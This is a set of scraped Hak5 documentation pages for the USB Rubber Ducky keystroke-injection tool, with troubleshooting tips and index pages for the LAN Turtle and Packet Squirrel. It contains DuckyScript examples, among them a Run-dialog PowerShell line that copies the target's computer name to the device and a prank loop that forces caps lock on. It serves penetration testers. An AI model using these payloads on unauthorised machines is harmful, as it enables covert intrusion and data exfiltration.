#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#result)
* Pressing the caps lock key on the target will cycle the USB Rubber Ducky LED between red and green.
info
If the LED does not change from red to green when pressing the caps lock key on the target, this is an indication that the target does not support synchronous reporting (most macOS targets).
SAVE and RESTORE Commands [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#save-and-restore-commands)
---------------------------------------------------------------------------------------------------------------------------------------
The currently reported lock key states may be saved and later recalled using the `SAVE_HOST_KEYBOARD_LOCK_STATE` and `RESTORE_HOST_KEYBOARD_LOCK_STATE` commands.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#example-1)
REM Example SAVE and RESTORE of of the Keyboard Lock State
ATTACKMODE HID STORAGE
DELAY 2000
SAVE_HOST_KEYBOARD_LOCK_STATE
$_RANDOM_MIN = 1
$_RANDOM_MAX = 3
VAR $TIMER = 120
WHILE ($TIMER > 0)
VAR $A = $_RANDOM_INT
IF ($A == 1) THEN
CAPSLOCK
ELSE IF ($A == 2) THEN
NUMLOCK
ELSE IF ($A == 3) THEN
SCROLLLOCK
END_IF
DELAY 50
$TIMER = ($TIMER - 1)
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#result-1)
* At the beginning of the payload, the currently reported keyboard lock state are saved.
* For about 6 seconds, as a while loop iterates 120 times with a 50 ms delay, the caps, num or scroll lock keys will be randomly pressed.
* When the “keyboard fireworks” display has concluded, the previously saved keyboard lock state will be restored.
* Meaning, if the target has caps lock off, scroll lock off, and num lock on before the payload began, so too would it after its conclusion.
Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#internal-variables)
-------------------------------------------------------------------------------------------------------------------------
The following internal variables relate to the lock keys and may be used in your payload for advanced functions.
| Internal Variable | Description |
| --- | --- |
| `$_CAPSLOCK_ON` | `TRUE` if on, `FALSE` if off. |
| `$_NUMLOCK_ON` | `TRUE` if on, `FALSE` if off. |
| `$_SCROLLLOCK_ON` | `TRUE` if on, `FALSE` if off. |
| `$_SAVED_CAPSLOCK_ON` | On USB attach, sets `TRUE` or `FALSE` depending on the reported OS condition. |
| `$_SAVED_NUMLOCK_ON` | On USB attach, sets `TRUE` or `FALSE` depending on the reported OS condition. |
| `$_SAVED_SCROLLLOCK_ON` | On USB attach, sets `TRUE` or `FALSE` depending on the reported OS condition. |
| `$_RECEIVED_HOST_LOCK_LED_REPLY` | On receipt of any lock state LED control code, sets `TRUE`. This flag is helpful for fingerprinting certain operating systems (e.g. macOS) or systems which do not communicate lock keys "correctly". |
### $\_RECEIVED\_HOST\_LOCK\_LED\_REPLY [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#_received_host_lock_led_reply)
REM Example Blink green if LED states are reported, otherwise blink red.
ATTACKMODE HID STORAGE
DELAY 2000
FUNCTION BLINK_RED()
WHILE TRUE
LED_OFF
DELAY 50
LED_R
DELAY 50
END_WHILE
END_FUNCTION
FUNCTION BLINK_GREEN()
WHILE TRUE
LED_OFF
DELAY 50
LED_G
DELAY 50
END_WHILE
END_FUNCTION
IF ($_RECEIVED_HOST_LOCK_LED_REPLY == TRUE) THEN
BLINK_GREEN()
ELSE IF ($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) THEN
BLINK_RED()
END_IF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#result-2)
* The USB Rubber Ducky will blink green if the LED states are reported by the target. Otherwise, the LED will blink red.
### $\_CAPSLOCK\_ON [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#_capslock_on)
REM Example ONLY CAPS FOR YOU (Evil Prank)
ATTACKMODE HID STORAGE
DELAY 2000
WHILE TRUE
IF ($_CAPSLOCK_ON == FALSE) THEN
CAPSLOCK
END_IF
DELAY 100
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/#result-3)
* If caps lock is turned off by the user, it will be turned on by the USB Rubber Ducky.
* * *
[_navigate\_before_ Storage Activity](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/)
[Exfiltration _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/)
---
# TIPS & TROUBLESHOOTING | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
TIPS & TROUBLESHOOTING
======================
* * *
---
# Conditional Compilation | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Conditional Compilation
=======================
As covered in the [Constants section](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/constants/)
, `DEFINE` can be used to declare constants used throughout your payloads. Using `DEFINE` and some additional commands described below we can gain even more control over the source code that get included into your `inject.bin`during compilation.
### What problem does this solve? [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#what-problem-does-this-solve)
Imagine you have a payload that you would like to add some **optional** features to. With the help of a `DEFINE` you could provide a set of boolean constants to toggle those features on or off; consider the example below:
DEFINE #EnableExtraFeature1 TRUE
DEFINE #EnableExtraFeature2 FALSE
DEFINE #EnableExtraFeature3 FALSE
... payload ...
IF #EnableExtraFeature1 THEN
... code will always run ...
END_IF
IF #EnableExtraFeature2 THEN
... code will always get skipped at runtime ...
END_IF
IF #EnableExtraFeature3 THEN
... code that will always get skipped at runtime ...
END_IF
Here we have `#EnableExtraFeature1` set to `TRUE`. At the time of compile `IF #EnableExtraFeature1 THEN` will become `IF TRUE THEN` which will allow for the code within that `IF` statement to be executed.
While the payload user is deciding to enable that feature _before_ compiling their `inject.bin` by setting `#EnableExtraFeature1` to `TRUE`, the USB Rubber Ducky is still evaluating the `IF` statement **during runtime of the payload** even though we know `IF TRUE` will _always_ evaluate to `TRUE`.
In the opposite case, the features that are **disabled** are _still compiled into the `inject.bin` ._ The USB Rubber Ducky still has to evaluate the `IF #EnabledExtraFeature3 THEN` which we know will become `IF FALSE THEN` to decide to skip the code within the `IF` statement. This becomes not only a waste of space but a waste of computation that could be better used.
### Solution [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#solution)
Using `IF_DEFINED_TRUE` `IF_NOT_DEFINED_TRUE` and `ELSE_DEFINED`,we can conditionally include portions of our payload in the resulting `inject.bin`.
info
These act similarly to `IF / ELSE` except they are evaluated **before** compile time and control _inclusion_ or _exclusion_ of blocks of code.
IF\_DEFINED\_TRUE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#if_defined_true)
-----------------------------------------------------------------------------------------------------------------------------------
With `IF_DEFINED_TRUE`, the code within it’s body/block will be compiled into the `inject.bin` _ONLY_ if the given `LABEL` **exists and evaluates to** `TRUE`
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#syntax)
IF_DEFINED_TRUE #LABEL
... code ...
END_IF_DEFINED
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#example)
DEFINE #EnableExtraFeature1 TRUE
DEFINE #EnableExtraFeature2 FALSE
... payload ...
IF_DEFINED_TRUE #EnableExtraFeature1
... code that will be included because #EnableExtraFeature1 is TRUE ...
END_IF_DEFINED
IF_DEFINED_TRUE #EnableExtraFeature2
... code that wont be included because #EnableExtraFeature2 is FALSE ...
END_IF_DEFINED
IF_DEFINED_TRUE #EnableExtraFeature3
... code that wont be included because #EnableExtraFeature3 does not exist ...
END_IF_DEFINED
IF\_NOT\_DEFINED\_TRUE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#if_not_defined_true)
--------------------------------------------------------------------------------------------------------------------------------------------
As the opposite of `IF_DEFINED_TRUE`, with `IF_NOT_DEFINED_TRUE`, the code within it’s body/block will be compiled into the `inject.bin` if the given `LABEL` **does not** **exist or evaluates to** `FALSE`
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#syntax-1)
IF_NOT_DEFINED_TRUE #LABEL
... code ...
END_IF_DEFINED
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#example-1)
DEFINE #EnableExtraFeature1 TRUE
DEFINE #EnableExtraFeature2 FALSE
... payload ...
IF_NOT_DEFINED_TRUE #EnableExtraFeature1
... code that wont be included because #EnableExtraFeature1 is TRUE ...
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #EnableExtraFeature2
... code that will be included because #EnableExtraFeature2 is FALSE ...
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #EnableExtraFeature3
... code that will be included because #EnableExtraFeature3 does not exist ...
END_IF_DEFINED
ELSE\_DEFINED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#else_defined)
----------------------------------------------------------------------------------------------------------------------------
Used in combination with `IF_DEFINED_TRUE` and `IF_NOT_DEFINED_TRUE` to provide the alternative to the provided condition; the negated case. Code within the `ELSE_DEFINED` body/block will only be included if the paired `IF_DEFINED_TRUE` or `IF_NOT_DEFINED_TRUE` case **is not met**.
### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#syntax-2)
IF_DEFINED_TRUE #LABEL
... code ...
ELSE_DEFINED
... other code ...
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #LABEL
... code ...
ELSE_DEFINED
... other code ...
END_IF_DEFINED
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/#example-2)
DEFINE #EnableExtraFeature1 TRUE
DEFINE #EnableExtraFeature2 FALSE
... payload ...
IF_NOT_DEFINED_TRUE #EnableExtraFeature1
... code that wont be included because #EnableExtraFeature1 is TRUE ...
ELSE_DEFINED
... alternative to feature 1 that wont be included because #EnableExtraFeature1 is TRUE ...
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #EnableExtraFeature2
... code that will be included because #EnableExtraFeature2 is FALSE ...
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #EnableExtraFeature3
... code that will be included because #EnableExtraFeature3 does not exist ...
END_IF_DEFINED
* * *
[_navigate\_before_ Extensions](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions/)
[Common Issues _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/)
---
# Common Issues | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Common Issues
=============
Device Fully Unresponsive [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#device-fully-unresponsive)
--------------------------------------------------------------------------------------------------------------------------------------------------
### Symptoms [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#symptoms)
* Unresponsive to button presses
* Payload does not run
* Does not appear as a `HID` or `STORAGE` device to the host
* No LED
* Appears as DFU device in device manager (or equivalent)
### Cause [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#cause)
The USB Rubber Ducky is likely stuck in DFU mode.
This happens by entering DFU mode (_accidentally)_ by holding the button **while inserting the Ducky to a host** - some hosts will set a bit keeping the device in DFU mode resulting in the above symptoms.
### Solution [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#solution)
1. Ensure the button is not being permanently held down by the Sticker Mod.
2. Do not hold the button _while inserting_ the USB Rubber Ducky into a target system.
3. To resume normal usage perform the following: [https://shop.hak5.org/pages/dfu-reset](https://shop.hak5.org/pages/dfu-reset)
RED LED / Stuck in Arming mode [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#red-led--stuck-in-arming-mode)
-----------------------------------------------------------------------------------------------------------------------------------------------------------
### Symptoms [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#symptoms-1)
* USB Rubber Ducky always mounts as a storage device automatically upon insert
* LED is RED
* Payload will not run
### Cause(s) [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#causes)
* No payload on root of SD card named `inject.bin`
* `inject.bin` is **misnamed** (likely as a duplicate `inject (2).bin` or similar)
* `inject.bin` is an empty file as a result of incomplete download or file transfer
* SD Card file system is corrupt due to unsafe ejection during write (while transferring an `inject.bin` for example)
### Solution(s) [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#solutions)
* Ensure your payload is correctly compiled, fully copied to the root of the SD card when in arming mode (`ATTACKMODE STORAGE`), and named `inject.bin` **exactly.**
* Safely eject the Ducky after copying the `inject.bin`
Button unresponsive / Cannot enter Arming mode [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#button-unresponsive--cannot-enter-arming-mode)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### Symptoms [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#symptoms-2)
* Pressing the button does not put the USB Rubber Ducky in Arming mode (`ATTACKMODE STORAGE`)
### Cause(s) [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#causes-1)
* The currently installed payload provides a `BUTTON_DEF` that overrides the default but does not put the device into `ATTACKMODE STORAGE`
### Solution(s) [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#solutions-1)
Check your currently installed payload’s source code (the DuckyScript that you used to generate the `inject.bin`). If the payload overrides the default `BUTTON_DEF`:
1. Open the USB Rubber Ducky case
2. Remove the SD Card
3. Re-insert the USB Rubber Ducky into the host, confirm the LED is red
4. While the USB Rubber Ducky is plugged into the host, re-insert the SD Card
5. If the USB Rubber Ducky does not automatically mount the SD Card after a few seconds, press the button
6. Replace the `inject.bin` with a payload that:
1. Has a sufficient `DELAY` at the beginning of the payload giving you a window of opportunity to enter arming mode (`ATTACKMODE STORAGE`) by pressing the button to trigger the default button behavior
2. Alter your `BUTTON_DEF` to include `ATTACKMODE STORAGE`
3. Uses `ATTACKMODE HID STORAGE` instead of _just_ `ATTACKMODE HID`
4. Enters `ATTACKMODE STORAGE` at the end of your payload
5. Provide an alternate behavior to your `BUTTON_DEF` based on logic (number of presses or host lock key state, etc)
Incorrect injection [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#incorrect-injection)
--------------------------------------------------------------------------------------------------------------------------------------
### Symptoms [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#symptoms-3)
* STRING or key commands do not inject the correct key(s) on a target host
### Causes [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#causes-2)
The target host uses a different keyboard layout than the payload was compiled for.
info
If the correct language was used at the time the payload was generated it is possible that language has incorrect values or missing keys.
### Solutions [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#solutions-2)
Use the correct keyboard language for the target host. See: [PayloadStudio docs](https://docs.hak5.org/payload-studio/customization/compiler-settings#changing-languages)
Other [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#other)
----------------------------------------------------------------------------------------------------------
### 3rd party encoders [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#3rd-party-encoders)
The USB Rubber Ducky has been around for over a decade! This leaves lots of room for now out of date information. Many old tutorials suggest using various “encoders” to compile your payload into a inject.bin. Hak5 originally provided a Java based command line encoder, replaced in 2018 in favor of a single file JSencoder that ran in your browser; both of which have been fully replaced by [PayloadStudio](https://payloadstudio.hak5.org/)
. Any “encoder” besides PayloadStudio is **fully unsupported** and likely 3rd party; Expect inconsistent results.
info
PayloadStudio will work for original USB Rubber Duckies running DuckyScript 1.0
See: [PayloadStudio docs](https://docs.hak5.org/payload-studio/getting-started/faq#can-i-use-payloadstudio-if-i-have-an-original-usb-rubber-ducky-to-write-duckyscript-v1)
### Windows 11 Notepad Input Lag [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#windows-11-notepad-input-lag)
Recently Microsoft has updated Notepad on Windows 11; many sources (including those entirely unrelated to the USB Rubber Ducky) have reported numerous issues. Due to this we do not recommend using Notepad to test your payloads; instead use an alternative text editor, or even the Console within PayloadStudio.
**Symptoms**: Input lag; jittery input while injecting keystrokes into Notepad. **Solution**: Use an alternative text editor, or even the Console within PayloadStudio.
### Common questions [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#common-questions)
* Can’t change payload / How do I enter arming mode?
* How do I press the button with the case still on?
First, make sure you’ve read up on the basics – you will likely find the answer to your problem or question here:
*
" data-bs-toggle="tooltip" href="/hak5-usb-rubber-ducky/unboxing-quack-start-guide/">Quick start guide
* [Hello world!](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world/)
### Payload not working as intended [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/#payload-not-working-as-intended)
From time to time you might find a payload doesn’t behave how you expect - most often these issues are caused by the payload itself. This could be anything from a logical flaw to a fundamental issue in what or how it is trying to do something.
Unfortunately this category of problem is as broad of a topic and as open ended as any other programming language; Here are a couple _general tips_ to help get you pointed in the right direction:
* Try accomplishing the task manually before trying to fully automate it with a DuckyScript payload
* The slower and less hidden a payload is, the easier it will be to debug and identify possible issues. Save the stealth and speed for after you get it working in the most basic case. _“walk before you run”_
Still having trouble? [Head over to discord and ask for help.](https://discord.gg/HMH5yyKuuA)
**The Hak5 Discord server is not an official support channel.** **Remember that any help offered is by people spending their own time to do so. Be polite and treat others with respect.**
You can seek **official support** for Hak5 products at [https://shop.hak5.org/pages/support](https://shop.hak5.org/pages/support)
.
* * *
[_navigate\_before_ Conditional Compilation](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation/)
[Tips _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/tips/)
---
# Tips | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
ARMING MODE - Development Tricks
_article_
Tips
====
ARMING MODE - Development Tricks [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/tips/#arming-mode---development-tricks)
-------------------------------------------------------------------------------------------------------------------------------------------------------
By Default the USB Rubber Ducky executes the payload immediately upon boot. While this is great for deployment, depending on the payload itself, this can become a pain point during development. Thankfully with the power of DuckyScript 3 there are MANY options to mitigate this problem.
### Boot DELAY [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/tips/#boot-delay)
During development it can be beneficial to add a `DELAY` to the beginning of your payload to provide a comfortable window to enter `ARMING MODE` safely. The longer the `DELAY` the less risk there is of accidentally missing the window and having your payload execute on your development machine.
### Invert Default Behavior [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/tips/#invert-default-behavior)
Another way to make development easier is by inverting the default behavior with your payload. The below code will make the USB Rubber Ducky boot directly into `ATTACKMODE STORAGE` and only continue to entering `ATTACKMODE HID` and executing (the rest of) your payload after you’ve pressed the button.
ATTACKMODE STORAGE
WAIT_FOR_BUTTON_PRESS
ATTACKMODE HID
REM payload after this line
There are many variants to the above technique; on a system like Windows that reflects lock states you could easily replace `WAIT_FOR_BUTTON_PRESS`with Lock key conditions. The example below will only execute (the rest of) your payload after you’ve turned caps lock on and then off…
ATTACKMODE STORAGE
WAIT_FOR_CAPS_ON
WAIT_FOR_CAPS_OFF
ATTACKMODE HID
REM payload after this line
There are nearly countless creative ways to take advantage of DuckyScript 3 on the USB Rubber Ducky in this manner; while the opposite of the above use-case, [this `PROTECTED_STORAGE_MODE` `EXTENSION`](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/protected_storage_mode.txt)
requires a secret combination to be entered using all three lock key states and the button before it enters `ARMING MODE`
Payload Development with Virtual Machines [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/tips/#payload-development-with-virtual-machines)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Desktop virtualization allows you to run multiple operating systems on a single computer without the need for separate hardware. Desktop hypervisors such as Parallels, VMware Workstation, or VirtualBox enable you to create a virtual environment on your computer. This allows you to run different operating systems.
This can be helpful when testing USB Rubber Ducky payloads as it provides a way to simulate various target operating systems. This is particularly helpful for testing payloads in a safe, isolated environment without risking damage to your primary system.
Here are some tips for using the USB Rubber Ducky with a virtual machine.
### Create a snapshot [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/tips/#create-a-snapshot)
Snapshots in virtualization allow you to capture a virtual machine’s state at a specific point in time, creating a backup of the virtual environment that you can return to at any time.
When testing USB Rubber Ducky payloads, snapshots can be particularly helpful because they provide a quick and easy way to revert to a previous state of the virtual machine if something goes wrong during testing. If a payload causes unexpected behavior or system instability, you can quickly roll back to a snapshot taken before the payload was loaded, allowing you to continue testing without having to reinstall the entire operating system or virtual machine.
This can save a significant amount of time and effort, making testing more efficient and effective.
### Set USB Passthrough rules based on VID and PID [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/tips/#set-usb-passthrough-rules-based-on-vid-and-pid)
USB passthrough is a feature in desktop virtualization that allows USB devices to be connected and used directly with a virtual machine, as if they were connected to the host computer.
Most virtualization software allows you to specify which USB devices will automatically connect to the host operating system, and which will be connected to the guest virtual machine.
USB [VID (Vendor ID) and PID (Product ID)](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#vid-and-pid-overview)
values are unique identifiers assigned to USB devices. By specifically selecting certain VID and PID values to connect to the guest VM, and using these values in conjunction with the [ATTACKMODE](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/)
command when developing payloads, you may ensure that on attachment the USB Rubber Ducky will connect to the guest virtual machine.

Example of a USB Rubber Ducky configured to automatically connect to a Windows 11 virtual machine using the Parallels desktop virtualization software
Similarly, by selecting a pair of VID and PID values for Arming Mode, one may configure the USB Rubber Ducky to attach to the host operating system — for example, on button press.

The same USB Rubber Ducky using a different VID/PID pair
In the above example, the VID and PID values `046D` and `C31C` are configured as permanently assigned devices which will automatically connect to the Windows 11 virtual machine.
If the button is pressed, the VID and PID values `05AC` and `021E` will automatically connect to the mac OS host machine for further payload development and arming.
* * *
[_navigate\_before_ Common Issues](https://docs.hak5.org/hak5-usb-rubber-ducky/tips-and-troubleshooting/common-issues/)
---
# Storage Activity | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
Storage Activity
================
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#overview)
------------------------------------------------------------------------------------------------------------
Storage activity is an experimental feature which may be used to detect whether or not the storage device, when using `ATTACKMODE STORAGE` is in use. This can be helpful when performing USB exfiltration. It can also be used to determine whether the storage device has been activated, useful for VID and PID enumeration.
info
Results may vary greatly depending on target OS. Some operating systems may keep storage active for an exceptionally long time.
WAIT\_FOR\_STORAGE\_ACTIVITY [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#wait_for_storage_activity)
-------------------------------------------------------------------------------------------------------------------------------------------------
The `WAIT_FOR_STORAGE_ACTIVITY` command blocks all further payload execution until activity on the USB Rubber Ducky storage has been detected.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#example)
REM Example WAIT_FOR_STORAGE_ACTIVITY Payload
ATTACKMODE HID STORAGE
DELAY 2000
LED_OFF
STRINGLN Waiting for the disk to be read from or written to...
$_STORAGE_ACTIVITY_TIMEOUT = 10000
WAIT_FOR_STORAGE_ACTIVITY
LED_OFF
LED_R
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#result)
* The LED will light red after storage activity has been detected.
WAIT\_FOR\_STORAGE\_INACTIVITY [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#wait_for_storage_inactivity)
-----------------------------------------------------------------------------------------------------------------------------------------------------
The `WAIT_FOR_STORAGE_INACTIVITY` command blocks all further payload execution until the storage device is determined to be inactive.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#example-1)
REM Example WAIT_FOR_STORAGE_INACTIVITY Payload
ATTACKMODE HID STORAGE
DELAY 2000
LED_OFF
GUI r
DELAY 100
STRING powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRINGLN echo $env:computername >> $m:\computer_names.txt"
$_STORAGE_ACTIVITY_TIMEOUT = 10000
WAIT_FOR_STORAGE_INACTIVITY
LED_OFF
LED_R
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#result-1)
* The LED will light red when the storage device becomes inactive.
Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#internal-variables)
--------------------------------------------------------------------------------------------------------------------------------
The following internal variables relate to storage activity and may be used in your payload for advanced functions.
### $\_STORAGE\_ACTIVITY\_TIMEOUT [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/storage-activity/#_storage_activity_timeout)
As payload is running, this value decrements if storage activity is not detected.
Default value is 1000.
* * *
[_navigate\_before_ Payload Hiding](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/payload-hiding/)
[Lock Keys _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/lock-keys/)
---
# LAN Turtle by Hak5 | Hak5 - LAN Turtle
[](https://docs.hak5.org/lan-turtle/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
LAN Turtle by Hak5
==================
USB Ethernet adapters with covert backdoors. These seemingly innocent USB Ethernet adapters are discreet remote access toolkits and man-in-the-middles for penetration testers and systems administrators.

warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* * *
[LAN Turtle Basics _navigate\_next_](https://docs.hak5.org/lan-turtle/getting-started/lan-turtle-basics/)
---
# Packet Squirrel Mark by Hak5 | Hak5 - Packet Squirrel
[](https://docs.hak5.org/packet-squirrel/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Packet Squirrel Mark by Hak5
============================
The [Packet Squirrel](https://hak5.org/products/packet-squirrel)
by Hak5 is a stealthy pocket-sized man-in-the-middle. This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.

warning
The e-book PDF generated by this document may not format correctly on all devices. For the most-to-date version, please see [https://docs.hak5.org](https://docs.hak5.org/)
* [Packet Squirrel by Hak5](https://docs.hak5.org/packet-squirrel/README.md)
Getting Started [_link_](https://docs.hak5.org/packet-squirrel/#getting-started)
---------------------------------------------------------------------------------
* [Packet Squirrel Basics](https://docs.hak5.org/packet-squirrel/getting-started/packet-squirrel-basics/)
* [USB Flash Disk Support](https://docs.hak5.org/packet-squirrel/getting-started/usb-flash-disk-support/)
* [Default Settings](https://docs.hak5.org/packet-squirrel/getting-started/default-settings/)
* [LED Status Indications](https://docs.hak5.org/packet-squirrel/getting-started/led-status-indications/)
* [Selecting and Adding Payloads](https://docs.hak5.org/packet-squirrel/getting-started/selecting-and-adding-payloads/)
Default Payloads [_link_](https://docs.hak5.org/packet-squirrel/#default-payloads)
-----------------------------------------------------------------------------------
* [Logging Network Traffic](https://docs.hak5.org/packet-squirrel/default-payloads/logging-network-traffic/)
* [Spoofing DNS](https://docs.hak5.org/packet-squirrel/default-payloads/spoofing-dns/)
* [OpenVPN Payload](https://docs.hak5.org/packet-squirrel/default-payloads/openvpn-payload/)
Internet Connectivity [_link_](https://docs.hak5.org/packet-squirrel/#internet-connectivity)
---------------------------------------------------------------------------------------------
* [Getting the Packet Squirrel Online](https://docs.hak5.org/packet-squirrel/internet-connectivity/getting-the-packet-squirrel-online/)
Software Updates [_link_](https://docs.hak5.org/packet-squirrel/#software-updates)
-----------------------------------------------------------------------------------
* [Upgrading Firmware](https://docs.hak5.org/packet-squirrel/software-updates/upgrading-firmware/)
* [Manual Upgrade](https://docs.hak5.org/packet-squirrel/software-updates/manual-upgrade/)
Payload Development [_link_](https://docs.hak5.org/packet-squirrel/#payload-development)
-----------------------------------------------------------------------------------------
* [Payload Development Basics](https://docs.hak5.org/packet-squirrel/payload-development/payload-development-basics/)
* [Ducky Script for Packet Squirrel](https://docs.hak5.org/packet-squirrel/payload-development/ducky-script-for-packet-squirrel/)
* [The NETMODE Command](https://docs.hak5.org/packet-squirrel/payload-development/the-netmode-command/)
